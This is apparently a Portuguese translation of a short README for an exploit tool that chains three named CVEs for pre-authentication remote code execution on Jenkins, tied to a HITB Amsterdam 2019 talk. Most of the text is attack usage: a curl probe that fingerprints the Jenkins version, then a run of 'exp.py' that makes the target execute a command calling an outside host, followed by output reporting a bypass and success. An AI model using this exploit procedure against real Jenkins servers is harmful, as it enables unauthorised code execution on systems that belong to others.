
Não existe RCE pré-autenticada no Jenkins desde maio de 2017, mas esta é a exceção!
Não há RCE pré-autenticado no Jenkins desde maio de 2017, mas este é o caso!
Ele encadeia CVE-2018-1000861, CVE-2019-1003005 e CVE-2019-1003029 para uma execução remota de código pré-autenticada mais confiável e elegante!
ANONYMOUS_READ desabilitado
ANONYMOUS_READ habilitado (ou com uma conta de usuário normal)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
Parte dos slides da minha palestra no HITB AMS 2019:
